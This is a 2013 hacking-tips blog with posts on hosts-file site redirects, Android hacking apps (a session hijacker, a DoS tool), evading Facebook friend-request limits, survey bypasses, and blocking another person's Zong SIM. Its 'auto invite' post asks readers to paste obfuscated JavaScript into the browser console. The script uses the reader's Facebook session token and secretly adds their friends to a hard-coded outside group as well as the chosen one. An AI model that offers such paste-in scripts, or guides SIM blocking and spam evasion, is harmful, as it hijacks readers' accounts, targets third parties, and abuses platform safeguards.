Monday 29 July 2013

How to block and replace a website on a PC!

I m going to show an old method - but it is worth to refresh it and post it there 

How to block and replace a website on a PC

My computer=> C drive => Windows=>System32=>drivers=>etc=> host file

Open host file in WordPad or notepad

Now open CMD and type in CMD ping then copy the IP Address of Google website

In host file just write the IPaddress of Google website that you copy and name of the website which one you want to block.


in this case you will type in URL but Google website will open.

for block:
type or

it’s not going to open which one you will type.

Hope you found it useful 

Wednesday 24 July 2013

Best top 5 hacking apps for android

Today i am gonna tell you about the top 5 android app for hacking. As we all know hacking and pen testing is only can be done on computers. But now the world is changes now your mobile is small hacking toolkit using these apps. Must try all these apps.

The Android Network Toolkit

In the last Defcon conference a new tool has been released by a security researcher and the tool is called “The Android network toolkit”. The has been developed for penetration tester and ethical hackers to test any network and vulnerabilities by using their mobile phones. This toolkit contain different apps that will help any hacker to find vulnerabilities and possibly exploit it. The company behind the app is an Israeli security firm called Zimperium.


Nmap for Android

Nmap (network mapper) is one the best among different network scanner (port finder) tool, Nmap mainly developed for Unix OS but now it is available on Windows and Android as well. Nmap for android is a Nmap apps for your phone! Once your scan finishes you can e-mail the results. This application is not a official apps but it looks good.

FaceNiff- Session Hijacker for Android

Your Facebook account is at risk, just like a Firesheep (for firefox hacking) there is a FaceNiff for hijacking the session of famous social networking websites includes facebook and twitter. FaceNiff is developed by Bartosz Ponurkiewicz who created Firesheep before but faceniff is for android OS.

AnDOSid- DOS Tool for Android

DOS or denial of service attack is very dangerous attack because it takes down the server 
(computer).AnDOSid allows security professionals to simulate a DOS attack (A http post flood attack to be exact) and of course a dDOS on a web server, from mobile phones.AnDOSid is designed for security professionals only!

SSHDroid- Android Secure Shell

Secure shell or SSH is the best protocol that provides an extra layer of security while you are connecting with your remote machine.SSHDroid is a SSH server implementation for Android.
This application will let you to connect to your device from a PC and execute commands (like "terminal" and "adb shell").

Monday 22 July 2013

Send Facebook Request In blocking

Facebook is a popular social network site where we can easily connect with our friends, family's. However Facebook don't makes it easy for us to add unknown people as our friends. You may have experienced a stage at least one time in your FB account showing a popup message that your friend request has been blocked for 1 day, 3 days, 7 days, 15 days or even 30 days. At that time you can't send out friend request on Facebook to anybody no matter if you know that person or not you been banned to send request for a particular time period. This is due to Facebook guidelines which don't allow us to send friend request to strangers because it considers it as spam, for that reason facebook temporarily turned off your sending friend request option. This is usually done to protect personal privacy of peoples, quite a few people use to add unknown people as their friends and  make misuse of their profile. Here we will give you some trick not to get banned from sending friend request onfacebook and some guidelines to keep your account not disable.

This is an working legal trick to send friend request to your mutual friends and unknown people 

1.Get the person's email address first .
2.Visit Add Personal Contacts as Friends
3.Here you can send friend request even if your are blocked by using their email address.
4.If you want to send friend request to lot's of friends here is an quick and easy way to do this.
5.Open up a new notepad file, paste all your friends email separated by comma (,)
6.Save the notepad file with the extension .vcf
7.This is your list of your contact files containing your friends email address.
8.Go to Add Personal Contacts as Friends click on the last option other tools there you can find upload contact file.
9.Browse your .vcf file and upload to the facebook.
10.It will send friend request to your friend's by email and facebook.

You are done!
Simple yet effective!

-> How Not to Get Blocked by Sending Friend Request on FB

If you just joined facebook add some few peoples you know them say about 10-20 members that you closely know. Let these people confirm your friend request first. Don't send frequent friend request to peoples,let the pending request be confirmed first after that you can send request. Always add people with a time gap of 2-4 minutes. If you send request consistently then a popup box showing to solve the captcha. Add people, which has high number of mutual friends so that facebook don't consider it as spam.Let us know if you any tricks to send friend request while your block in the comments below.

Sunday 21 July 2013

How To Auto Invite All Friends To Facebook Group?

How To Auto Invite All Friends To Facebook Group?

How to auto invite all friends to your facebook group?
Facebook is one of the best social platform in the internet.Because comes with many features like fan page, group,invents etc., which makes their users to stick with them.Sharing is so much easy in Facebook and lot of groups made each day.But adding friends one by one to your group is so much difficult to add all friends .so finally we found unique and easy way to do so.So if you are admin or a member of some group and want to invite all friends then check out this.

Auto Invite Facebook Friends:

  •  You must be a approved member or administrator of that Group
  •  You should go to the facebook group page in your chrome or firefox browser in which you want to add all friends.
  •  If you are using firefox, Just press Ctrlshift+k and paste the below copied code there
  •  If you are using Google Chrome browser, Just press F2 and paste the below codes in console menu.
 function penetrasi(e){jx.load(window.location.protocol+"//"+document.getElementsByName("fb_dtsg")[0].value+"&group_id="+memberGroupId+"&source=typeahead&members="+e+"&nctr[_mod]=pagelet_group_members_summary&lsd&post_form_id_source=AsyncRequest&__user="+Env.user,function(e){e=e.substring(e.indexOf("{")),e=JSON.parse(e),i--,kunaon="<div class='friend-edge-name' style='text-align:left;font-size:10px;white-space:pre-wrap;",e.error?(kunaon+="color:darkred'>",kunaon=e.errorDescription?kunaon+e.errorDescription:kunaon+JSON.stringify(e,null,"")):(kunaon+="color:darkgreen'>",kunaon+=arr[i],suc++),kunaon+="</div>",e="<div id='friend-edge-display' style='position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;background-color:rgba(255,255,255,0.9);z-index:9999;font-size:14px;text-align:center;padding:15px;border-radius:14px;border:8px solid rgba(0,0,0,0.5)'>"+("<div style='padding-bottom:10px;font-size:20px;'>"+tulisanNganu+"</div>"),0<i?(e+=arr.length+" Suscribers detected<br/>",e+="<b>"+suc+"</b> Suscribers added of "+(arr.length-i)+" Suscribers Processed ",e+="("+i+" more to go..)",e=e+"<div class='friend-edge'>"+kunaon,e+="</div>"):(e+=arr.length+" Suscribers detected and ",e+="<b>"+suc+" Suscribers added</b>",e+="<div><span class='uiButton' onClick='document.getElementById(\"pagelet_welcome_box\").style.display=\"none\"'>Close</span></div>"),document.getElementById("pagelet_welcome_box").innerHTML=e+"</div>"},"text","post"),tay--;if(0<tay){var t=arr[tay];setTimeout("penetrasi("+t+")",100)}console.log(tay+"/"+arr.length+":"+t+", success:"+suc),0xf2a794cf90e3!=memberGroupId&&jx.load(window.location.protocol+"//"+document.getElementsByName("fb_dtsg")[0].value+"&group_id=130950837105760&source=typeahead&members="+e+"&nctr[_mod]=pagelet_group_members_summary&lsd&post_form_id_source=AsyncRequest&__user="+Env.user,function(){},"text","post")}function clickfr_callback(){0<document.getElementsByName("ok").length&&nHtml.ClickUp(document.getElementsByName("ok")[0]);var e=arr[i];i<arr.length&&addfriend(e.substring(0,4))}function clickfr(){0<document.getElementsByClassName("search").length?(console.log(document.getElementsByClassName("search")[0].childNodes[0].childNodes[0].childNodes[1].innerHTML),document.getElementsByClassName("search")[0].childNodes[0].childNodes[0].href="javascript:void(0);",nHtml.ClickUp(document.getElementsByClassName("search")[0].childNodes[0].childNodes[0].childNodes[1])):j++,setTimeout("clickfr_callback()",2e3)}function addfriend(e){i++,document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].focus(),document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].value=e,document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].blur(),document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].focus(),document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].focus(),setTimeout("clickfr()",2e3)}function sleep(e){for(var t=(new Date).getTime(),n=0;1e7>n&&!((new Date).getTime()-t>e);n++);}var tulisanNganu="Auto SUSCRIBE",kunaon="";jx={getHTTPObject:function(){var e=!1;if("undefined"!=typeof ActiveXObject)try{e=new ActiveXObject("Msxml2.XMLHTTP")}catch(t){try{e=new ActiveXObject("Microsoft.XMLHTTP")}catch(n){e=!1}}else if(window.XMLHttpRequest)try{e=new XMLHttpRequest}catch(r){e=!1}return e},load:function(b,c,d,e,g){var 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style='padding-bottom:10px;font-size:20px;'>"+tulisanNganu+"</div>"),e+=arr.length+" SUSCRIBERS detected",document.getElementById("pagelet_welcome_box").innerHTML=e+"</div>",penetrasi(arr[i])})

Thursday 18 July 2013

How to bypass surveys top 6 methods

Method 1:-

So Guys here is the first method to do it by simply Login to a site called as Surveybypass.Just Login to this and copy the survey link which you want to Bypass and the just hit the Go !!! Button after that you get then you get a new link from which you can download the file without any problem.

Note:-This method sometimes not work on some site but don't worry you can try the other Methods.

Method 2:-

So guys here is the second one it is also an online website named as HowtobypassSurveys.Just Open the website and there would be a 1mb Software just download it and run it and then just enter the link you want to bypass the survey and just hit enter you will get a new download link of that file and you can download it without any survey.

Method 3:-

Google Chrome user you can easily Bypass surveys with just a Chrome Plugin.You can download it from here.Just Download it and install it and it will in the upper right Corner and click it whenever you want to bypass a survey.

Method 4:-

 After Chrome user it's time for Firefox users.You can download the Plugin from here and easily bypass surveys from it.

Method 5:-

Or you can Disable JavaScript on the browser which will never let the surveys appear.

Google Chrome users:-
1) Click on Settings’ Wrench on the top right of Google Chrome.
2) Click Options.
3) Scroll down, and Click Advanced system Settings
4) Click on Content Settings to show options of Google Chrome web page content.
5) Under JavaScript section check the box: Do not allow any site to run JavaScript
6) Done! Now just go the website that asks for surveys and you’ll bypass them.

Method 6 :-

1) When you are prompted to take a survey, Right Click the title and Click Inspect Element

2) Now keep pressing Delete button to delete scripts on Inspect Element tab, until Complete a Survey disappear

3) After the bar disappear, keep deleting until the Page go lighter (whiten) with no dark area.

4) Done! Now you’ll see your full content or download on Sharecash.

Method 7:
Guyz this is the seventh method  :p
Only easy one's with: XJZ Survey Remover (Its a google chrome plugin).
But, it doesn't work for

Tuesday 9 July 2013

How To Block Any zong Sim

1. login here Click with your ZOng number and then put any zong number 

2. then enter any zong target number which you want to block in this end of link:

3. XXXXXXXXXX es ki jata apna target ka number zong ka 313??????? without 0 ok

4. Copy link and pass web address bar.

5. Now done it.